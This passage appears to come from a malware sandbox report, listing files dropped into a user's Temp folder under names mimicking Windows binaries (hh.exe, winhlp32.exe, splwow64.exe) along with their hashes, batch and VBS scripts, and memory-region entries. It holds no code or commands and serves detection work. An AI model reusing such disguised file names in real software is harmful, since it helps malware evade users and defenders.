        SHA256

        b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

        SHA512

        98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

      • C:\Users\Admin\AppData\Local\Temp\Cab2906.tmp

        Filesize

        67KB

        MD5

        2d3dcf90f6c99f47e7593ea250c9e749

        SHA1

        51be82be4a272669983313565b4940d4b1385237

        SHA256

        8714e7be9f9b6de26673d9d09bd4c9f41b1b27ae10b1d56a7ad83abd7430ebd4

        SHA512

        9c11dd7d448ffebe2167acde37be77d42175edacf5aaf6fb31d3bdfe6bb1f63f5fdbc9a0a2125ed9d5ce0529b6b548818c8021532e1ea6b324717cc9bec0aaa5

      • C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

        Filesize

        4.4MB

        MD5

        3405f654559010ca2ae38d786389f0f1

        SHA1

        8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

        SHA256

        bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

        SHA512

        cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

      • C:\Users\Admin\AppData\Local\Temp\bfsvc.cfg

        Filesize

        420B

        MD5

        51c9e864182413f35b76d42d435df261

        SHA1

        dc5ec227ab38093927a119b4d646c3811c3553cd

        SHA256

        e6c5c674268a865db840afd3764cd498bdfd8fe677c5193d662abbe64d68975b

        SHA512

        b36e683b6487bfbf4e512214343128e57a52eb71356345caba70a98dc5b0bad764da842d08443d3b47bd3dddbe24af146c561ae480038c95f124a51565e3fd99

      • C:\Users\Admin\AppData\Local\Temp\compile.bat

        Filesize

        156B

        MD5

        eb51755b637423154d1341c6ee505f50

        SHA1

        d71d27e283b26e75e58c0d02f91d91a2e914c959

        SHA256

        db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9

        SHA512

        e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5

      • C:\Users\Admin\AppData\Local\Temp\compile.bat

        Filesize

        71B

        MD5

        91128da441ad667b8c54ebeadeca7525

        SHA1

        24b5c77fb68db64cba27c338e4373a455111a8cc

        SHA256

        50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873

        SHA512

        bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd

      • C:\Users\Admin\AppData\Local\Temp\compile.bat

        Filesize

        70B

        MD5

        d90accebb3f79fe65cd938425c07b0ae

        SHA1

        9df3812a88d87dd419cd9e89afa5fb1d71be0dc9

        SHA256

        aca74cefaef4b7a32338c9c63187cffa1e808b54ab218a064007683ad1bd3a0e

        SHA512

        44013bfda1dbe5b217d4872e8d550cd00471cb8b969ffd6b07f83b0c59ac20ec2512d275a4603cc00e5de3a04666f66e897601ba51a5e02af622e5139ac04560

      • C:\Users\Admin\AppData\Local\Temp\compile.bat

        Filesize

        74B

        MD5

        808099bfbd62ec04f0ed44959bbc6160

        SHA1

        f4b6853d958c2c4416f6e4a5be8a11d86f64c023

        SHA256

        f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8

        SHA512

        e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0

      • C:\Users\Admin\AppData\Local\Temp\compile.vbs

        Filesize

        265B

        MD5

        ca906422a558f4bc9e471709f62ec1a9

        SHA1

        e3da070007fdeae52779964df6f71fcb697ffb06

        SHA256

        abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

        SHA512

        661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

      • C:\Users\Admin\AppData\Local\Temp\config

        Filesize

        107B

        MD5

        5cf0b95f68c3304427f858db1cdde895

        SHA1

        a0c5c3872307e9497f8868b9b8b956b9736a9cdf

        SHA256

        353de1200b65a2e89e84b32067a908103cca22ad2e51ba62c171eef3c25b73aa

        SHA512

        5c11c4ebcd4663d02ee3ffc19b7ec83b953dca7a7a1d2b63edaab72425a61e926ac940d99f2faa6b1baba0d28068e8f3ae64105990e0a0626ba02d8f979b455b

      • C:\Users\Admin\AppData\Local\Temp\hh.exe

        Filesize

        103KB

        MD5

        4d4c98eca32b14aeb074db34cd0881e4

        SHA1

        92f213d609bba05d41d6941652a88c44936663a4

        SHA256

        4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

        SHA512

        959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

      • C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe

        Filesize

        391KB

        MD5

        053778713819beab3df309df472787cd

        SHA1

        99c7b5827df89b4fafc2b565abed97c58a3c65b8

        SHA256

        f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

        SHA512

        35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

      • C:\Users\Admin\AppData\Local\Temp\splwow64.exe

        Filesize

        49KB

        MD5

        0d8360781e488e250587a17fbefa646c

        SHA1

        29bc9b438efd70defa8fc45a6f8ee524143f6d04

        SHA256

        ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64

        SHA512

        940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

      • C:\Users\Admin\AppData\Local\Temp\whysosad

        Filesize

        3KB

        MD5

        fc3c88c2080884d6c995d48e172fbc4f

        SHA1

        cb1dcc479ad2533f390786b0480f66296b847ad3

        SHA256

        1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664

        SHA512

        4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1

      • C:\Users\Admin\AppData\Local\Temp\winhlp32.exe

        Filesize

        184KB

        MD5

        a776e68f497c996788b406a3dc5089eb

        SHA1

        45bf5e512752389fe71f20b64aa344f6ca0cad50

        SHA256

        071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1

        SHA512

        02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

      • C:\Users\Admin\AppData\Local\Temp\xwizard.cfg

        Filesize

        1KB

        MD5

        ae8eed5a6b1470aec0e7fece8b0669ef

        SHA1

        ca0e896f90c38f3a8bc679ea14c808726d8ef730

        SHA256

        3f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e

        SHA512

        e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6

      • \Users\Admin\AppData\Local\Temp\bfsvc.exe

        Filesize

        71KB

        MD5

        899d3ed011eb58459b8a4fc2b81f0924

        SHA1

        80361f1e0b93143ec1ddfee156760f5938c85791

        SHA256

        5e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954

        SHA512

        802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05

      • \Users\Admin\AppData\Local\Temp\xwizard.exe

        Filesize

        544KB

        MD5

        df991217f1cfadd9acfa56f878da5ee7

        SHA1

        0b03b34cfb2985a840db279778ca828e69813116

        SHA256

        deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112

        SHA512

        175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

      • memory/1772-132-0x0000000000400000-0x000000000041B000-memory.dmp

        Filesize

        108KB

      • memory/1936-128-0x0000000000400000-0x000000000045B000-memory.dmp

        Filesize

        364KB

      • memory/2416-115-0x0000000000170000-0x00000000001CB000-memory.dmp

        Filesize

        364KB

      • memory/2480-13-0x00000000748E0000-0x0000000074FCE000-memory.dmp

        Filesize

        6.9MB

      • memory/2480-42-0x0000000000650000-0x000000000065C000-memory.dmp

        Filesize

        48KB

      • memory/2480-46-0x00000000008C0000-0x00000000008CA000-memory.dmp

        Filesize

        40KB

      • memory/2480-45-0x0000000000D20000-0x0000000000D5C000-memory.dmp

        Filesize

        240KB

      • memory/2480-44-0x0000000000CF0000-0x0000000000D20000-memory.dmp

        Filesize

        192KB

      • memory/2480-43-0x00000000008A0000-0x00000000008BA000-memory.dmp

        Filesize

        104KB

      • memory/2480-48-0x0000000000320000-0x0000000000328000-memory.dmp

        Filesize

        32KB

      • memory/2480-10-0x00000000748EE000-0x00000000748EF000-memory.dmp

        Filesize

        4KB

      • memory/2480-80-0x0000000005200000-0x0000000005208000-memory.dmp

        Filesize

        32KB

      • memory/2480-47-0x0000000004770000-0x0000000004812000-memory.dmp

        Filesize

        648KB

      • memory/2480-131-0x00000000748EE000-0x00000000748EF000-memory.dmp

        Filesize

        4KB

      • memory/2480-136-0x00000000748E0000-0x0000000074FCE000-memory.dmp

        Filesize

        6.9MB

      • memory/2480-79-0x0000000004ED0000-0x0000000004ED8000-memory.dmp

        Filesize

        32KB

      • memory/2480-181-0x00000000748E0000-0x0000000074FCE000-memory.dmp

        Filesize

        6.9MB

      • memory/2480-12-0x00000000046C0000-0x0000000004770000-memory.dmp

        Filesize

        704KB

      • memory/2480-11-0x0000000000E40000-0x00000000012BA000-memory.dmp

        Filesize

        4.5MB

      • memory/2644-0-0x000007FEF5D03000-0x000007FEF5D04000-memory.dmp

        Filesize

        4KB

      • memory/2644-1-0x0000000000170000-0x00000000005EE000-memory.dmp

        Filesize

        4.5MB

      • memory/2644-124-0x000007FEF5D03000-0x000007FEF5D04000-memory.dmp

        Filesize

        4KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.